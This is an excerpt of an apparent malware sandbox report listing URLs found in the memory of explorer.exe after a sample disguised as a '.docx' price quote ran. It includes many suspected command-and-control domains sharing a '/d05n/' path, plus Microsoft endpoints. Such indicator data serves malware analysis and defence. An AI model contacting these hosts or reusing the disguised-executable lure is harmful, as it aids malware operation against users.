          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-implants-50062.bondReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.joops.music
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.joops.music/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.joops.music/d05n/www.upta.bio
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.joops.musicReferer:
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699986277.0000000002805000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1831855062.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782270171.0000000002806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r-outsourcing-69869.bond
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r-outsourcing-69869.bond/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r-outsourcing-69869.bond/d05n/www.apaescortatings.xyz
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r-outsourcing-69869.bondReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trl-migrate.online
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trl-migrate.online/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trl-migrate.online/d05n/www.r-outsourcing-69869.bond
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trl-migrate.onlineReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.upta.bio
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.upta.bio/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.upta.bio/d05n/www.9838.xyz
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.upta.bioReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ursing-caregiver-jobs-za-3.bond
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ursing-caregiver-jobs-za-3.bond/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ursing-caregiver-jobs-za-3.bond/d05n/www.trl-migrate.online
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ursing-caregiver-jobs-za-3.bondReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xc31.top
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xc31.top/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xc31.top/d05n/www.ursing-caregiver-jobs-za-3.bond
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xc31.topReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ybzert.online
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ybzert.online/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ybzert.online/d05n/www.ynapticshiftai.tech
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ybzert.onlineReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ynapticshiftai.tech
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ynapticshiftai.tech/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ynapticshiftai.tech/d05n/www.eanliving.site
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ynapticshiftai.techReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ynthia-mcc-lin-tick.link
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ynthia-mcc-lin-tick.link/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ynthia-mcc-lin-tick.link/d05n/www.atingdilse.site
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ynthia-mcc-lin-tick.linkReferer:
          Source: explorer.exe, 00000006.00000000.1808128757.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4178769883.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000006.00000003.3492560819.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106881820.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000006.00000003.3492560819.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106881820.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000006.00000000.1808128757.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000006.00000003.3107012452.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000006.00000003.3107012452.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000006.00000002.4169868345.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1789379993.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4170982966.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1787918751.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000006.00000003.3107012452.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000006.00000003.3107012452.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
